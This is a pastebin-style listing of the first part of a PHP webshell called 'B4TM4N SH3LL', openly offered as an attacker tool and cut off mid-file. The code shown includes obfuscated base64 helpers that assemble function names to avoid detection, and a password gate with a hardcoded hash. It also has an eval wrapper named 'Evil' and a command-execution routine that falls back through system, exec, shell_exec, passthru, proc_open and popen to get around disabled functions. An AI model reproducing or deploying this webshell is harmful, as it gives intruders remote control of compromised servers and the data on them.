· 6 years ago · Mar 19, 2019, 12:56 PM
1<?php
2
3/*
4 * B4TM4N SH3LL is PHP WEBSHELL
5 *
6 * Features:
7 * [0] File Manager
8 * [1] Sec. Info
9 * [2] Simply Database
10 * [3] Interactive terminal
11 * [4] PHP Reverse Back Connect
12 * [5] Run PHP Code
13 * [6] Custom Toolz
14 * [7] Self Script Encryptor !
15 * [8] Error Handler
16 * [9] Themes
17 *
18 * Account:
19 * [Username] B64E('user')
20 * [Password] sha1(md5('pass'))
21 */
22
23$x_ = "63a9f0ea7bb98050796b649e85481845"; //root
24
25/*
26 * Self Script Encryptor v1.0
27 * ------- by k4mpr3t -------
28 *
29 * [Usage] http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
30 *
31 */
32
33$config=array(
34 "title" => "B4TM4N SH3LL", // Your Title
35 "subtitle" => "V3RS10N 2.7 ~ k4mpr3t", // Your Subtitle
36 "themes" => "br34k", // Your Themes (D4RK or BR34K)
37 "debug" => false // Debug Mode
38);
39
40$account=explode(':',$x_);
41
42session_start(); // Session Start
43
44function any($x,$y)
45{
46 return array_key_exists($x,$y);
47}
48
49function urle($x)
50{
51 return B64E(urlencode($x));
52}
53
54function urld($x)
55{
56 return urldecode(B64D(urldecode($x)));
57}
58
59define('_',DIRECTORY_SEPARATOR);
60
61foreach($_SERVER as $k => $v)
62{
63 define(strtolower($k),$_SERVER[$k]);
64}
65
66function B64E($x)
67{
68 $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
69 $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
70 $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
71 $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
72 $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
73 return strtr($b64($x),$d,$c);
74}
75
76function B64D($x)
77{
78 $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
79 $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
80 $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
81 $_g="_";$_h="d";$_i="e";$_j="c";$_k="o";$_l="d";$_m="e";
82 $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
83 return $b64(strtr($x,$d,$c));
84}
85
86function error ($errno, $errstr, $errfile, $errline)
87{
88 switch ($errno)
89 {
90 case E_PARSE:
91 case E_STRICT:$errmsg='# DEBUG';break;
92 case E_NOTICE:
93 case E_USER_NOTICE:$errmsg='# NOTICE';break;
94 case E_USER_ERROR:
95 case E_RECOVERABLE_ERROR:$errmsg='# ERROR';break;
96 case E_WARNING:
97 case E_CORE_WARNING:
98 case E_COMPILE_WARNING:
99 case E_USER_WARNING:$errmsg='# WARNING';break;
100 case E_ERROR:
101 case E_CORE_ERROR:
102 case E_COMPILE_ERROR:$errmsg='# FATAL ERROR';break;
103 default:$errmsg='# UNKNOWN ERROR';break;
104 }
105 echo '<div class="error">';
106 echo $errmsg;
107 echo "<br>";
108 echo $errstr;
109 echo "<br>";
110 echo $errfile . ' (Line: ' . $errline . ')';
111 echo "<br>";
112 echo "<br>";
113 echo "</div>";
114}
115
116// Login Request
117if(request_method=="POST")
118{
119 if(any("username",$_REQUEST)&&any("password",$_REQUEST)&&any("signin",$_REQUEST))
120 {
121 if((B64E($_REQUEST['username'])==$account[0])&&(sha1(md5($_REQUEST['password']))==$account[1]))
122 {
123 session_regenerate_id();
124 $_SESSION['action']=array(
125 "username" => B64E($_REQUEST['username']),
126 "password" => sha1(md5($_REQUEST['password']))
127 );
128 }
129 else
130 {
131 // THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5)
132 $log=array(
133 "Username: ".$_REQUEST['username'],
134 "Password: ".$_REQUEST['password'],
135 "Remote IP: ".remote_addr,
136 "Time: ".date('Y-m-d H:i:s'),
137 "-------------------------\r\n",
138 );
139 $file=dirname(__FILE__)._.'.log';
140 $write_log=implode($log,"\r\n");
141 $op=fopen($file,'a+');
142 fwrite($op,$write_log);
143 fclose($op);
144 }
145 }
146}
147
148if(!any("action",$_SESSION))
149{
150?><!doctype html>
151<html lang="en">
152<head>
153<meta charset="utf-8">
154<meta name="robots" content="noindex"/>
155<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
156<title>Signin</title>
157<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
158<style type='text/css'>
159 html,body{
160 height:100%;
161 }
162 body{
163 display:-ms-flexbox;
164 display:-webkit-box;
165 display:flex;
166 -ms-flex-align:center;
167 -ms-flex-pack:center;
168 -webkit-box-align:center;
169 align-items:center;
170 -webkit-box-pack:center;
171 justify-content:center;
172 padding-top:40px;
173 padding-bottom:40px;
174 background-color:#f5f5f5;
175 }
176 .form-signin{
177 width:100%;
178 max-width:330px;
179 padding:15px;
180 margin:0 auto;
181 }
182 .form-signin.checkbox{
183 font-weight:400;
184 }
185 .form-signin.form-control{
186 position:relative;
187 box-sizing:border-box;
188 height:auto;
189 padding:10px;
190 font-size:16px;
191 }
192 .form-signin.form-control:focus{
193 z-index:2;
194 }
195 .form-signin input[type="email"]{
196 margin-bottom:-1px;
197 border-bottom-right-radius:0;
198 border-bottom-left-radius:0;
199 }
200 .form-signin input[type="password"]{
201 margin-bottom:10px;
202 border-top-left-radius:0;
203 border-top-right-radius:0;
204 }
205</style>
206</head>
207<body class="text-center">
208 <form class="form-signin" method='post'>
209 <h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
210 <label for="username" class="sr-only">Email address</label>
211 <input type="text" name="username" id="username" class="form-control" placeholder="Username" autocomplete="off" required autofocus>
212 <label for="password" class="sr-only">Password</label>
213 <input type="password" name="password" id="password" class="form-control" placeholder="Password" autocomplete="off" required>
214 <button class="btn btn-lg btn-primary btn-block" type="submit" name="signin" value="signin">Sign In</button>
215 <p class="mt-5 mb-3 text-muted">©<?=date('Y')?></p>
216 </form>
217</body>
218</html><?php
219}
220else
221{
222ob_start(); // Prevent Double Html $_REQUEST
223
224if(!strpos(strval(ini_get('disable_functions')),'set_time_limit'))
225{
226 set_time_limit(0);
227}
228
229// Debug Settings
230if($config['debug']==true)
231{
232 set_error_handler('error'); // Error Handler
233 error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
234}
235else
236{
237 error_reporting(0);
238 ini_set('error_log',null);
239 ini_set('html_errors',0);
240 ini_set('log_errors',0);
241 ini_set('log_errors_max_len',0);
242 ini_set('display_errors',0);
243 ini_set('display_startup_errors',0);
244}
245
246ini_set('max_execution_time','600');
247ini_set('memory_limit','256M');
248
249$agent=B64D("FT06ACQoAXYrvHYXMUIMMV5e"); // Powered by B4TM4N
250$title=$config['title']; // Title Page
251$start=microtime(true); // Time Pageload
252
253?><!DOCTYPE html>
254<html>
255<head>
256<title>
257<?=$title?>
258</title>
259<meta name='author' content='k4mpr3t'/>
260<link href="data:image/png;base64,AAABAAEAEBACAAAAAACwAAAAFgAAACgAAAAQAAAAIAAAAAEAAQAAAAAAQAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAP//AAD//wAA//8AAP7/AAD8fwAAwAcAAMAHAACMYwAADWEAAP//AAD//wAA//8AAP//AAD//wAA" rel="icon" type="image/x-icon" />
261<style type="text/css">
262
263 <?php if(strtolower($config['themes']) == 'd4rk'): ?>
264 :root {
265 --background-color:#000;
266 --color:#00ff00;
267 --txt-color: #fff;
268 --txt-hover-color: #fff;
269 --border-color: #222;
270 --border-hover-color: #333;
271 --table-odd-color : #000;
272 --table-even-color : #111;
273 --table-hover-color : #222;
274 --button-color : #111;
275 --button-hover-color : #222;
276 }
277 <?php endif; ?>
278
279 <?php if(strtolower($config['themes']) == 'br34k'): ?>
280 :root {
281 --background-color:#fff;
282 --color:#000;
283 --txt-color: #000;
284 --txt-hover-color: #666;
285 --border-color: #111;
286 --border-hover-color: #222;
287 --table-odd-color : #eee;
288 --table-even-color : #ddd;
289 --table-hover-color : #ccc;
290 --button-color : #ccc;
291 --button-hover-color : #bbb;
292 }
293 <?php endif; ?>
294
295 @keyframes blinker{70%{opacity:0}}
296 *,html{margin:0;padding:0;line-height:1rem}
297 body{background:var(--background-color);color:var(--color);font-family:monospace;font-size:13px}
298 ::-moz-selection{background:var(--color);color:var(--background-color)}
299 ::selection{background:var(--color);color:var(--background-color)}
300 img{vertical-align:bottom}
301 hr{border:1px solid var(--border-color);margin:3px 0px 0px}
302 a{color:var(--color);text-decoration:none}
303 a:hover{color:var(--txt-hover-color)}
304 a.active{color:var(--txt-color)}
305 a.action{font-size:12px;padding:5px;margin:0px;background:var(--button-color);color:var(--txt-color);border:1px solid #222;cursor:pointer;outline:none;display:inline-block}
306 a.action:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
307 label{display:inline-block;min-width:75px;padding-right:15px}
308 iframe{background:var(--txt-hover-color)}
309 fieldset {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;box-sizing:border-box;min-height:154px}
310 textarea {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;min-height:300px;outline:none;box-sizing:border-box;resize:none}
311 input[type=submit]{background:var(--button-color);border:1px solid var(--border-color);color:var(--txt-color);line-height:25px;padding:0 10px;cursor:pointer;outline:none}
312 input[type=submit]:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
313 input[type=text]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
314 input[type=number]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
315 input[type=file]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:2px;outline:none;box-sizing:border-box}
316 select{background:var(--background-color);color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
317 #wrapper{width:93%;margin:37px auto 40px}
318 #info{margin:0 0 23px 0;padding:0 13px 0 0}
319 #header{display:inline-block;width:100%}
320 .header-left{float:left;width:66%}
321 .header-right{float:right;width:34%}
322 #connect{display:inline-block;width:100%}
323 .connect-left{float:left;width:49%}
324 .connect-right{float:right;width:49%}
325 #database-session{display:inline-block;width:100%}
326 .database-query{float:left;width:49%}
327 .database-process{float:right;width:49%}
328 #php{display:inline-block}
329 .php-left{float:left;width:49%}
330 .php-right{float:right;width:49%}
331 .divide{width:100%;display:inline-block}
332 .divide-left{float:left;width:50%}
333 .divide-right{float:right;width:50%}
334 .mail input[type=text]{width:100%;display:block}
335 .database-breadcrumb{margin:10px 0 0;display:inline-block;font-style: italic;}
336 #update{text-align:center}
337 #php-configuration{text-align:center}
338 .error{animation:blinker 1s linear infinite;background:var(--color);color:var(--background-color);padding:10px;margin:10px;}
339 #logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color)}
340 .content{border:1px solid var(--border-color);padding:10px;overflow:auto;overflow-y:hidden}
341 #process-list{padding:25px;margin:25px auto 0px;border:1px solid var(--border-color);overflow:scroll;overflow-y:hidden}
342 #process-list s{text-decoration:none}
343 .tools-header{margin-bottom:20px;padding-bottom:25px;text-align:center;border-bottom:1px solid var(--border-color)}
344 .menu{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
345 .menu > ul{list-style:none;margin:0;padding:0}
346 .menu > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
347 .menu > ul > li:hover{cursor:pointer}
348 .menu-tools{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
349 .menu-tools > ul{list-style:none;margin:0;padding:0}
350 .menu-tools > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
351 .menu-tools > ul > li:hover{cursor:pointer}
352 .menu-directory{;margin-bottom:10px}
353 .new{margin-right:15px;}
354 .hash label{min-width:40px;display:inline-block;padding-right:15px}
355 .hash-capture label{margin:10px 0;display:inline-block}
356 .hash input[type=radio]{margin-right:10px;display:inline-block;vertical-align:middle}
357 .auto-number table{counter-reset:row_}
358 .auto-number table tbody tr td:first-child{counter-increment:row_;vertical-align:middle;text-align:center}
359 .auto-number table tbody tr td:first-child::before{content:counter(row_)}
360 #title{text-align:center;font-size:44px;margin:0;color:var(--txt-color);margin-bottom:15px}
361 #subtitle{text-align:center;font-size:22px;margin:0;color:var(--txt-color);margin-top:8px}
362 #tools{min-height:125px;padding:10px;border-radius:5px}
363 #account{min-height:100px;padding:10px;border-radius:5px}
364 #thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}
365 #footer{margin:25px auto}
366 #copyrights{text-align:center}
367 #pageload{text-align:center}
368 #query{margin-top:10px}
369 #database-query{overflow:auto;margin:10px 0}
370 #hexdump{height:300px;overflow:auto;overflow-x:hidden}
371 #terminal{min-height:100px;padding:10px;border-radius:5px}
372 #terminal-input{border:none}
373 #curdir-terminal{min-width:10px}
374 #database{min-height:100px;padding:10px;border-radius:5px}
375 #database label{width:100px;padding:5px;margin-right:10px;display:inline-block}
376 #port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}
377 #phpinfo table{margin:25px 0}
378 #phpinfo tr:nth-child(odd){background:var(--background-color)}
379 #phpinfo tr:nth-child(even){background:var(--border-color)}
380 #phpinfo td,th{padding:5px;border:1px solid var(--border-color)}
381 #phpinfo h1{margin:10px 0}
382 #phpinfo h2{margin:10px 0}
383 #phpinfo.e{width:200px}
384 #phpinfo.v{word-break:break-word}
385 #phpinfo img{display:none}
386 #phpinfo hr{border:none}
387 .line h2{position:relative;top:12px;width:100px;display:inline;background:var(--background-color);padding:0 10px;color:var(--txt-color)}
388 .line{border-bottom:2px solid var(--color);text-align:center;width:287px;margin:auto}
389 .table {width:100%;margin:10px 0}
390 .table td,th{padding:5px;border:1px solid var(--border-color);max-width:250px;min-width:25px}
391 .table td.kanan{word-break:break-word}
392 .table td.kiri{width:30%}
393 .table tr:nth-child(odd){background:var(--table-odd-color)}
394 .table tr:nth-child(even){background:var(--table-even-color)}
395 .table tr:hover td{background:var(--table-hover-color)}
396 .table tfoot td{padding:10px;text-align:center}
397 .database-table > td.table {word-break:normal;}
398 .map-switch{display:inline-block}
399 .form-fix{margin:-15px 0}
400 .frmsource{margin-top:10px}
401 .hexdump{width:100%;padding:5px;margin-bottom:5px}
402 .hexdump td{text-align:left}
403 .highlight{background:var(--background-color);word-break:break-word;padding:15px;margin-bottom:5px;height:300px;overflow:auto}
404 .hash-capture{display:inline-block;width:100%}
405 .hash-capture-left{float:left;width:49%}
406 .hash-capture-right{float:right;width:49%}
407 .clr{clear:both}
408 .on{color:var(--txt-color)}
409 .off{color:red}
410 .result{padding:10px}
411 .sortable thead{cursor:pointer}
412 .disablefunc{overflow-wrap:break-word}
413 .loading{vertical-align:middle;width:16px;height:16px;display:inline-block;background:url('data:image/gif;base64,R0lGODlhEAAQAPIAAAAAAP///zw8PLy8vP///5ycnHx8fGxsbCH+GkNyZWF0ZWQgd2l0aCBhamF4bG9hZC5pbmZvACH5BAAKAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQACgABACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkEAAoAAgAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkEAAoAAwAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkEAAoABAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQACgAFACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQACgAGACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAAKAAcALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==')}
414</style>
415<script type="text/javascript">
416function dean_addEvent(t,e,r){if(t.addEventListener)t.addEventListener(e,r,!1);else{r.$$guid||(r.$$guid=dean_addEvent.guid++),t.events||(t.events={});var o=t.events[e];o||(o=t.events[e]={},t["on"+e]&&(o[0]=t["on"+e])),o[r.$$guid]=r,t["on"+e]=handleEvent}}function removeEvent(t,e,r){t.removeEventListener?t.removeEventListener(e,r,!1):t.events&&t.events[e]&&delete t.events[e][r.$$guid]}function handleEvent(t){var e=!0;t=t||fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var r=this.events[t.type];for(var o in r)this.$$handleEvent=r[o],!1===this.$$handleEvent(t)&&(e=!1);return e}function fixEvent(t){return t.preventDefault=fixEvent.preventDefault,t.stopPropagation=fixEvent.stopPropagation,t}var stIsIE=!1;if(sorttable={init:function(){arguments.callee.done||(arguments.callee.done=!0,_timer&&clearInterval(_timer),document.createElement&&document.getElementsByTagName&&(sorttable.DATE_RE=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,forEach(document.getElementsByTagName("table"),function(t){-1!=t.className.search(/\bsortable\b/)&&sorttable.makeSortable(t)})))},makeSortable:function(t){if(0==t.getElementsByTagName("thead").length&&(the=document.createElement("thead"),the.appendChild(t.rows[0]),t.insertBefore(the,t.firstChild)),null==t.tHead&&(t.tHead=t.getElementsByTagName("thead")[0]),1==t.tHead.rows.length){sortbottomrows=[];for(e=0;e<t.rows.length;e++)-1!=t.rows[e].className.search(/\bsortbottom\b/)&&(sortbottomrows[sortbottomrows.length]=t.rows[e]);if(sortbottomrows){null==t.tFoot&&(tfo=document.createElement("tfoot"),t.appendChild(tfo));for(e=0;e<sortbottomrows.length;e++)tfo.appendChild(sortbottomrows[e]);delete sortbottomrows}headrow=t.tHead.rows[0].cells;for(var e=0;e<headrow.length;e++)headrow[e].className.match(/\bsorttable_nosort\b/)||(mtch=headrow[e].className.match(/\bsorttable_([a-z0-9]+)\b/),mtch&&(override=mtch[1]),mtch&&"function"==typeof sorttable["sort_"+override]?headrow[e].sorttable_sortfunction=sorttable["sort_"+override]:headrow[e].sorttable_sortfunction=sorttable.guessType(t,e),headrow[e].sorttable_columnindex=e,headrow[e].sorttable_tbody=t.tBodies[0],dean_addEvent(headrow[e],"click",sorttable.innerSortFunction=function(t){if(-1!=this.className.search(/\bsorttable_sorted\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted","sorttable_sorted_reverse"),this.removeChild(document.getElementById("sorttable_sortfwdind")),sortrevind=document.createElement("span"),sortrevind.id="sorttable_sortrevind",sortrevind.innerHTML=stIsIE?' <font face="webdings">5</font>':" ▴",void this.appendChild(sortrevind);if(-1!=this.className.search(/\bsorttable_sorted_reverse\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted_reverse","sorttable_sorted"),this.removeChild(document.getElementById("sorttable_sortrevind")),sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",void this.appendChild(sortfwdind);theadrow=this.parentNode,forEach(theadrow.childNodes,function(t){1==t.nodeType&&(t.className=t.className.replace("sorttable_sorted_reverse",""),t.className=t.className.replace("sorttable_sorted",""))}),sortfwdind=document.getElementById("sorttable_sortfwdind"),sortfwdind&&sortfwdind.parentNode.removeChild(sortfwdind),sortrevind=document.getElementById("sorttable_sortrevind"),sortrevind&&sortrevind.parentNode.removeChild(sortrevind),this.className+=" sorttable_sorted",sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",this.appendChild(sortfwdind),row_array=[],col=this.sorttable_columnindex,rows=this.sorttable_tbody.rows;for(e=0;e<rows.length;e++)row_array[row_array.length]=[sorttable.getInnerText(rows[e].cells[col]),rows[e]];row_array.sort(this.sorttable_sortfunction),tb=this.sorttable_tbody;for(var e=0;e<row_array.length;e++)tb.appendChild(row_array[e][1]);
417delete row_array}))}},guessType:function(t,e){sortfn=sorttable.sort_alpha;for(var r=0;r<t.tBodies[0].rows.length;r++)if(text=sorttable.getInnerText(t.tBodies[0].rows[r].cells[e]),""!=text){if(text.match(/^-?[£$¤]?[\d,.]+%?$/))return sorttable.sort_numeric;if(possdate=text.match(sorttable.DATE_RE),possdate){if(first=parseInt(possdate[1]),second=parseInt(possdate[2]),first>12)return sorttable.sort_ddmm;if(second>12)return sorttable.sort_mmdd;sortfn=sorttable.sort_ddmm}}return sortfn},getInnerText:function(t){if(!t)return"";if(hasInputs="function"==typeof t.getElementsByTagName&&t.getElementsByTagName("input").length,null!=t.getAttribute("sorttable_customkey"))return t.getAttribute("sorttable_customkey");if(void 0!==t.textContent&&!hasInputs)return t.textContent.replace(/^\s+|\s+$/g,"");if(void 0!==t.innerText&&!hasInputs)return t.innerText.replace(/^\s+|\s+$/g,"");if(void 0!==t.text&&!hasInputs)return t.text.replace(/^\s+|\s+$/g,"");switch(t.nodeType){case 3:if("input"==t.nodeName.toLowerCase())return t.value.replace(/^\s+|\s+$/g,"");case 4:return t.nodeValue.replace(/^\s+|\s+$/g,"");case 1:case 11:for(var e="",r=0;r<t.childNodes.length;r++)e+=sorttable.getInnerText(t.childNodes[r]);return e.replace(/^\s+|\s+$/g,"");default:return""}},reverse:function(t){newrows=[];for(e=0;e<t.rows.length;e++)newrows[newrows.length]=t.rows[e];for(var e=newrows.length-1;e>=0;e--)t.appendChild(newrows[e]);delete newrows},sort_numeric:function(t,e){return aa=parseFloat(t[0].replace(/[^0-9.-]/g,"")),isNaN(aa)&&(aa=0),bb=parseFloat(e[0].replace(/[^0-9.-]/g,"")),isNaN(bb)&&(bb=0),aa-bb},sort_alpha:function(t,e){return t[0]==e[0]?0:t[0]<e[0]?-1:1},sort_ddmm:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},sort_mmdd:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},shaker_sort:function(t,e){for(var r=0,o=t.length-1,n=!0;n;){n=!1;for(s=r;s<o;++s)if(e(t[s],t[s+1])>0){a=t[s];t[s]=t[s+1],t[s+1]=a,n=!0}if(o--,!n)break;for(var s=o;s>r;--s)if(e(t[s],t[s-1])<0){var a=t[s];t[s]=t[s-1],t[s-1]=a,n=!0}r++}}},document.addEventListener&&document.addEventListener("DOMContentLoaded",sorttable.init,!1),/WebKit/i.test(navigator.userAgent))var _timer=setInterval(function(){/loaded|complete/.test(document.readyState)&&sorttable.init()},10);window.onload=sorttable.init,dean_addEvent.guid=1,fixEvent.preventDefault=function(){this.returnValue=!1},fixEvent.stopPropagation=function(){this.cancelBubble=!0},Array.forEach||(Array.forEach=function(t,e,r){for(var o=0;o<t.length;o++)e.call(r,t[o],o,t)}),Function.prototype.forEach=function(t,e,r){for(var o in t)void 0===this.prototype[o]&&e.call(r,t[o],o,t)},String.forEach=function(t,e,r){Array.forEach(t.split(""),function(o,n){e.call(r,o,n,t)})};var forEach=function(t,e,r){if(t){var o=Object;if(t instanceof Function)o=Function;else{if(t.forEach instanceof Function)return void t.forEach(e,r);"string"==typeof t?o=String:"number"==typeof t.length&&(o=Array)}o.forEach(t,e,r)}};
418</script>
419<script type="text/javascript">
420 var xhr;
421 window.onload=function(){
422 getFocus("terminal-input");
423 getFocus("find-action");
424 getFocus("sourcefocus");
425 getFocus("php-code");
426 };
427 function getFocus(id){
428 if(document.getElementById(id)!==null){
429 document.getElementById(id).focus();}
430 }
431 function getAjax(txt,id,method,url){
432 var xmlhttp;
433 var urlf="";
434 var data=new FormData();
435 var params=url.split("&");
436 for(i=0;i<params.length;i++){
437 val=params[i].split("=");
438 if(val[0]=='text-encode'){
439 data.append(val[0],val[1]);
440 }else{if(val[0].indexOf('?')<0)
441 {urlf+='&'+val[0]+'='+val[1];}}}
442 if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();
443 }else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
444 xmlhttp.onreadystatechange=function(){
445 sts=["Request Not Initialized",
446 "Server Connection Established",
447 "Request Received",
448 "Processing Request",
449 "Request Finished"];
450 if(xmlhttp.readyState==4&&xmlhttp.status==200){
451 if(txt){document.getElementById(id).innerHTML=xmlhttp.responseText;
452 }else{document.getElementById(id).value=xmlhttp.responseText;}
453 }else{
454 if(txt){document.getElementById(id).innerHTML=
455 "[Status] "+"Please Wait... <div class='loading'></div><br>"+
456 "[State] "+sts[xmlhttp.readyState]+"<br>"+
457 "[Response] "+xmlhttp.response;
458 }else{document.getElementById(id).value=
459 "[Status] "+"Please Wait...\n"+
460 "[State] "+sts[xmlhttp.readyState]+"\n"+
461 "[Response] "+xmlhttp.response;}}
462 };
463 xmlhttp.open(method,window.location.href+urlf,true);
464 xmlhttp.send(data);
465 xhr=xmlhttp;
466 }
467 function ajaxAbort(txt,id){
468 if(txt){document.getElementById(id).innerHTML="Canceled";
469 }else{document.getElementById(id).value="Canceled";}
470 xhr.abort();
471 }
472 function checkAll(){
473 for(var i=0;i<document.getElementsByName('chk[]').length;i++){
474 document.getElementsByName('chk[]')[i].checked=document.getElementsByName('check-all')[0].checked;}
475 }
476 function checkCount(id){
477 count=1;
478 for(var i=0;i<document.getElementsByName('chk[]').length;i++){
479 if(document.getElementsByName('chk[]')[i].checked){
480 document.getElementById(id).innerHTML=count++;
481 }else{document.getElementById(id).innerHTML=count-1;}}
482 }
483 function mapSwitch(id,id2){
484 var a=document.getElementById(id);
485 var b=document.getElementById(id2);
486 if(a.style.display=='inline-block'){
487 a.style.display='none';
488 b.style.display='inline-block';
489 }else{a.style.display='inline-block';
490 b.style.display='none';}
491 }
492 function getParameter(p) {
493 var searchString=window.location.search.substring(1),
494 i,val,params=searchString.split("&");
495 for(i=0;i<params.length;i++){
496 val=params[i].split("=");
497 if(val[0]==p){
498 return val[1];}}
499 return null;
500 }
501</script>
502</head>
503<body>
504<div id="wrapper"><?php
505
506$cur=any("c",$_SESSION)?urld($_SESSION['c']):getcwd();
507$dir=any("d",$_REQUEST)?urld($_REQUEST['d']):$cur;
508$map=any("r",$_REQUEST)?dirname(urld($_REQUEST['r'])):$dir;
509
510function Unix()
511{
512 return(strtolower(substr(PHP_OS,0,3))!="win");
513}
514
515function Evil($x,$y=false)
516{
517 $c=$y==true?"?>".$x."<?php ":$x;
518 $evil=@eval($c);
519 if(error_get_last())
520 {
521 print "\n[Error] ";
522 return print_r(error_get_last());
523 }
524 return $evil;
525}
526
527function Execute($x)
528{
529 $x=$x.' 2>&1';
530 if(!is_null($backtic=`$x`))
531 {
532 return $backtic;
533 }
534 elseif(function_exists('system'))
535 {
536 ob_start();
537 $system=system($x);
538 $buff=ob_get_contents();
539 ob_end_clean();
540 return $buff;
541 }
542 elseif(function_exists('exec'))
543 {
544 $buff="";
545 exec($x,$results);
546 foreach($results as $result)
547 {
548 $buff.=$result;
549 }
550 return $buff;
551 }
552 elseif(function_exists('shell_exec'))
553 {
554 $buff=shell_exec($x);
555 return $buff;
556 }
557 elseif(function_exists('pcntl_exec'))
558 {
559 $buff=pcntl_exec($x);
560 return $buff;
561 }
562 elseif(function_exists('passthru'))
563 {
564 ob_start();
565 $passthru=passthru($x);
566 $buff=ob_get_contents();
567 ob_end_clean();
568 return $buff;
569 }
570 elseif(function_exists('proc_open'))
571 {
572 $proc=proc_open($x,array(
573 array("pipe","r"),
574 array("pipe","w"),
575 array("pipe","w")
576 ),$pipes);
577 $buff=stream_get_contents($pipes[1]);
578 return $buff;
579 }
580 elseif(function_exists('popen'))
581 {
582 $buff="";
583 $pop=popen($x,"r");
584 while(!feof($pop))
585 {
586 $buff.=fread($pop,1024);
587 }
588 pclose($pop);
589 return $buff;
590 }
